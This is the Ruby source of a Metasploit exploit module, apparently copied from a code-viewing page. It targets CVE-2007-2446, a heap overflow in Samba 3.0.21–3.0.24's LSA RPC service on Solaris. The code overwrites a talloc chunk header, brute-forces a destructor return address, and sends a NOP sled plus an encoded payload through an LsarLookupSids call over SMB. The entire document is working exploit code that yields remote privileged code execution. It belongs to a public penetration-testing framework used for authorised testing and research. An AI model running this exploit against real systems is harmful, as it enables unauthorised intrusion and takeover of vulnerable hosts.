Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11
  include Msf::Exploit::Brute
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'Samba lsa_io_trans_names Heap Overflow',
16
      'Description'    => %q{
17
        This module triggers a heap overflow in the LSA RPC service
18
      of the Samba daemon. This module uses the TALLOC chunk overwrite
19
      method (credit Ramon and Adriano), which only works with Samba
20
      versions 3.0.21-3.0.24. Additionally, this module will not work
21
      when the Samba "log level" parameter is higher than "2".
22
      },
23
      'Author'         =>
24
        [
25
          'Ramon de C Valle',
26
          'Adriano Lima <adriano[at]risesecurity.org>',
27
          'hdm'
28
        ],
29
      'License'        => MSF_LICENSE,
30
      'References'     =>
31
        [
32
          ['CVE', '2007-2446'],
33
          ['OSVDB', '34699'],
34
        ],
35
      'Privileged'     => true,
36
      'Payload'        =>
37
        {
38
          'Space'    => 1024,
39
        },
40
      'Platform'       => 'solaris',
41
      'Targets'        =>
42
        [
43
          ['Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',
44
          {
45
            'Platform'      => 'solaris',
46
            'Arch'          => [ ARCH_X86 ],
47
            'Nops'          => 64 * 1024,
48
            'Bruteforce' =>
49
              {
50
                'Start' => { 'Ret' => 0x082f2000 },
51
                'Stop'  => { 'Ret' => 0x084f2000 },
52
                'Step'  => 60 * 1024,
53
              }
54
          }
55
          ],
56
          ['Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',
57
          {
58
            'Platform'      => 'solaris',
59
            'Arch'          => [ ARCH_SPARC ],
60
            'Nops'          => 64 * 1024,
61
            'Bruteforce' =>
62
              {
63
                'Start' => { 'Ret' => 0x00322000 },
64
                'Stop'  => { 'Ret' => 0x00722000 },
65
                'Step'  => 60 * 1024,
66
              }
67
          }
68
          ],
69
          ['DEBUG',
70
          {
71
            'Platform'      => 'solaris',
72
            'Arch'          => [ ARCH_X86 ],
73
            'Nops'          => 64 * 1024,
74
            'Bruteforce' =>
75
              {
76
                'Start' => { 'Ret' => 0xaabbccdd },
77
                'Stop'  => { 'Ret' => 0xaabbccdd },
78
                'Step'  => 60 * 1024,
79
              }
80
          }
81
          ],
82
        ],
83
      'DisclosureDate' => '2007-05-14',
84
      'DefaultTarget'  => 0
85
      ))
86

87
    register_options(
88
      [
89
        OptString.new('SMBPIPE', [ true,  "The pipe name to use", 'LSARPC']),
90
      ])
91

92
  end
93

94
  # Need to perform target detection
95
  def autofilter
96
    false
97
  end
98

99
  def brute_exploit(target_addrs)
100

101
    if(not @nops)
102
      if (target['Nops'] > 0)
103
        print_status("Creating nop sled....")
104
        @nops = make_nops(target['Nops'])
105
      else
106
        @nops = ''
107
      end
108
    end
109

110
    print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret'])
111

112
    nops = @nops
113
    pipe = datastore['SMBPIPE'].downcase
114

115
    print_status("Connecting to the SMB service...")
116
    connect()
117
    smb_login()
118

119
    datastore['DCERPC::fake_bind_multi'] = false
120

121
    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
122
    print_status("Binding to #{handle} ...")
123
    dcerpc_bind(handle)
124
    print_status("Bound to #{handle} ...")
125

126
    num_entries  = 272
127
    num_entries2 = 288
128

129
    #
130
    # First talloc_chunk
131
    # 16 bits align
132
    # 16 bits sid_name_use
133
    #     16 bits uni_str_len
134
    #     16 bits uni_max_len
135
    #     32 bits buffer
136
    # 32 bits domain_idx
137
    #
138
    buf = (('A' * 16) * num_entries)
139

140
    # Padding
141
    buf << 'A' * 8
142

143
    # TALLOC_MAGIC
144
    talloc_magic = "\x70\xec\x14\xe8"
145

146
    # Second talloc_chunk header
147
    buf << 'A' * 8                         # next, prev
148
    buf << NDR.long(0) + NDR.long(0)       # parent, child
149
    buf << NDR.long(0)                     # refs
150
    buf << [target_addrs['Ret']].pack('V') # destructor
151
    buf << 'A' * 4                         # name
152
    buf << 'A' * 4                         # size
153
    buf << talloc_magic                    # flags
154

155
    stub = lsa_open_policy(dcerpc)
156

157
    stub << NDR.long(0)            # num_entries
158
    stub << NDR.long(0)            # ptr_sid_enum
159
    stub << NDR.long(num_entries)  # num_entries
160
    stub << NDR.long(0x20004)      # ptr_trans_names
161
    stub << NDR.long(num_entries2) # num_entries2
162
    stub << buf
163
    stub << nops
164
    stub << payload.encoded
165

166
    print_status("Calling the vulnerable function...")
167

168
    begin
169
      # LsarLookupSids
170
      dcerpc.call(0x0f, stub)
171
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
172
      print_status('Server did not respond, this is expected')
173
    rescue Rex::Proto::DCERPC::Exceptions::Fault
174
      print_error('Server is most likely patched...')
175
    rescue => e
176
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
177
        print_status('Server disconnected, this is expected')
178
      else
179
        print_error("Error: #{e.class}: #{e}")
180
      end
181
    end
182

183
    handler
184
    disconnect
185
  end
186

187
  def lsa_open_policy(dcerpc, server="\\")
188
    stubdata =
189
      # Server
190
      NDR.uwstring(server) +
191
      # Object Attributes
192
        NDR.long(24) + # SIZE
193
        NDR.long(0)  + # LSPTR
194
        NDR.long(0)  + # NAME
195
        NDR.long(0)  + # ATTRS
196
        NDR.long(0)  + # SEC DES
197
          # LSA QOS PTR
198
          NDR.long(1)  + # Referent
199
          NDR.long(12) + # Length
200
          NDR.long(2)  + # Impersonation
201
          NDR.long(1)  + # Context Tracking
202
          NDR.long(0)  + # Effective Only
203
      # Access Mask
204
      NDR.long(0x02000000)
205

206
    res = dcerpc.call(6, stubdata)
207

208
    dcerpc.last_response.stub_data[0,20]
209
  end
210

211

212
end
213

214